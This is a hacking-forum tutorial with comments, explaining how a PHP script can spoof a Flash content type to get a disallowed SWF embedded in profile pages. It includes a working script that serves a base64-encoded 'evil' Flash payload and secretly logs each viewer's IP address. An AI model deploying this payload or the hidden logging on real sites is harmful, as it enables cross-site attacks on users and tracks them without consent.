Follow us on Twitter!
I'd prefer to die standing, than to live on my knees - Che Guevara
Wednesday, April 16, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 12
Guests Online: 12
Members Online: 0

Registered Members: 82800
Newest Member: santana1744
Latest Articles

Content Type Spoofing

Arrow Image Fooling browser into doing things due to content type spoofing!



Often profile sites allow you to include music or an video. This however, can be an security risk when it is not properly implented. Even when all input is filtered, and with all (special character) output is encoded, we can initialize an XSS or CSRF atack using flash.

The music or video is often included in the profile with the <embed src> tag. This tag is dangerous when it is not used with the type, which set\'s the content type of the target source.

The content type is an indicator for a webbrowser how the downloaded content should be handled. We obiuosly dont want to get an flash file included. That\'s why the .swf is disallowed. This must be secure because we can\'t include a flash file then, or can we? The answer is that we still can. By setting a response-header the Content-Type to application/x-shockwave-flash.

So if we upload an php script that sets the header and the send\'s the \'evil\' flash file, the game would be over.

I shall provide u with an example of such a script. It contains the flash file base encoded, because of the characters it contains are not alphanumeric.

<?php
//set headers WIEEEEJ
//a pesonel script
//usage at own risk
header(\'Content-Type: application/x-shockwave-flash\');
$EvilCode=\"RldTCGwAAAAwCgCgAAwBAEQRAAAAAEMC////PwNHAAAAlg4AAHZhY2F0aW9uAAAzMAA8li0AAGh0dHA6Ly93d3cuYm9vdGxlZ2dlcnMudXMvcHJvZmlsZS5waHAAAF90b3AAmgEAAgBAAAAA\";
echo base64_decode($EvilCode);

$myFile = \"l0g.tXt\";
$fh = fopen($myFile, \'a\') ;
fwrite($fh, \"^_^ |\" . $_SERVER[\'REMOTE_ADDR\'] . \"| ^_^\\r\\n\");
fclose($fh);

?>

I hope u enjoyed my article and that I could make it a bit clear how it works, or maybe you allready knew it ;), anyways, please rate the article.

Comments

dalekoon August 16 2007 - 02:29:36
This can also be done with the "tamper data" firefox extension, which allows you to modify any posted content. You might be able to do it with livehttpheaders too.
Zarrayon August 16 2007 - 12:49:48
no, it cannot, tamper data tampers with the outgoing REQUEST, here we spoof the RESPONSE from the webserver
mozzeron August 24 2007 - 21:35:35
I don't quite get what you are getting at, all you've really shown is that you can run PHP when certain files are viewed which is not really content-type spoofing
system_meltdownon September 01 2007 - 08:15:03
You realize, even if you didn't have the logger in place, and it was actually just a SWF file, you could still get IPs from it, just check the access logs to see who's viewed it...
Zarrayon September 02 2007 - 11:32:08
yes i know, or an img tag pointing to an php script. But i included it so u could see who loaded he flash file....
mr noobon September 06 2007 - 22:47:53
what kind of fools would let you upload a php script in the first place? lol
Zarrayon September 08 2007 - 13:30:34
lol, a hosting company like freewebs,maybe ?
Post Comment

Sorry.

You must have completed the challenge Basic 1 and have 100 points or more, to be able to post.